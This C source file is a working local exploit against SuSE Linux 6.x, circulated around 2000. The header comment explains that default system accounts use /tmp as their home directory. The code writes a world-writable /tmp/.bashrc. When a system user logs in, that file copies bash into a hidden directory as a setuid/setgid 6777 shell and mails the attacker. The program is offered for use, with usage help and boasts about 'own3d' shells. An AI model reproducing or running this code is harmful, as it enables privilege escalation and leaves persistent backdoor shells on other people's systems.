/*

  SuSe Local tmp Xploit by wildcoyote@coders-pt.org

  Advisorie:

  In 'all' versions of SuSe, default shell users have /tmp/ for their $HOME!
  Because /tmp/ is world writable, any user on the shell can make a shell
  dot file (like .bashrc) wich the default'shell'users will execute on log on!
  When does this happen? Example: when r00t suids to a user like nobody :]

  Vulnerable (checked):

        SuSe Linux 6.4
        SuSe Linux 6.3 ppc
        SuSe Linux 6.3 alpha
        SuSe Linux 6.3
        SuSe Linux 6.2
        SuSe Linux 6.1 alpha
        SuSe Linux 6.1

    This information was taken from a security focus advisorie! 
                    (by a unknown (to me) poster)

*/

#include <stdio.h>
#include <strings.h>
#include <sys/types.h>
#include <sys/stat.h>

#define HIDDEN_DIR_TO_STORE_SHELLS "/tmp/.nothing_to_declare/"
#define PATH_TO_SYSTEM_MAIL "/bin/mail"
#define SUBJECT_FOR_MAIL "got another own3d shell"
#define DEFINED_WARN_MSG "Hey! Just wanna warn you that i gave you another shell!"

main(int argc, char *argv[])
{
 FILE *fx;
 char buf[512];
 printf("\n\t\tSuse Local tmp Xploit by wildcoyote@coders-pt.org\n\n");
 if(argc==1)
 {
  printf("Sintaxe: %s <username/valid mail account>\n",argv[0]);
  printf("Example:\n\n");
  printf(" -> If you want to be warned of a *new* own3d shell on tha b0x:\n");
  printf("    %s wildcoyote\n",argv[0]);
  printf(" -> If you want to be warned to a mail account (other then your shell):\n");
  printf("    %s wildcoyote@coders-pt.org\n\n",argv[0]);
  printf("Stay kewl :]\n\n");
  exit(-1);
 }
 printf("Generating .bashrc...");
 remove("/tmp/.bashrc"); // Just to make sure...
 fx=fopen("/tmp/.bashrc","a");
 fputs("# Yeaps! This is a shell dot file wich will gimme lots of default shell accounts on thiz suse box :))\n",fx);
 snprintf(buf,sizeof(buf),"if test -d %s\n",HIDDEN_DIR_TO_STORE_SHELLS);
 fputs(buf,fx);
 bzero(buf,strlen(buf));
 fputs("then teste=1\n",fx);
 snprintf(buf,sizeof(buf),"else mkdir %s ; chmod 777 %s\n",HIDDEN_DIR_TO_STORE_SHELLS,HIDDEN_DIR_TO_STORE_SHELLS);
 fputs(buf,fx);
 bzero(buf,strlen(buf));
 fputs("fi\n",fx);
 fputs("a=$RANDOM\n",fx);
 snprintf(buf,sizeof(buf),"cp /bin/bash %sown3d.$a\n",HIDDEN_DIR_TO_STORE_SHELLS);
 fputs(buf,fx);
 bzero(buf,strlen(buf));
 snprintf(buf,sizeof(buf),"chmod 6777 %sown3d.$a\n",HIDDEN_DIR_TO_STORE_SHELLS);
 fputs(buf,fx);
 bzero(buf,strlen(buf));
 snprintf(buf,sizeof(buf),"%s -s '%s' %s %s\n",PATH_TO_SYSTEM_MAIL,SUBJECT_FOR_MAIL,argv[1],DEFINED_WARN_MSG);
 fputs(buf,fx);
 fclose(fx);
 printf("DONE\n");
 chmod("/tmp/.bashrc",00777);
 printf("Oh k! /tmp/.bashrc is now created! :]\n");
 printf("When r00t suids to one of the default shell'userz wich have /tmp as their $HOME\n");
 printf("It will run /tmp/.bashrc and give you a own3d shell ;)\n");
 printf("(own3d shells will stay on %s)\n",HIDDEN_DIR_TO_STORE_SHELLS);
 printf("Regardz, wildcoyote@coders-pt.org\n\n");
}
/*                    www.hack.co.za           [3 July 2000]*/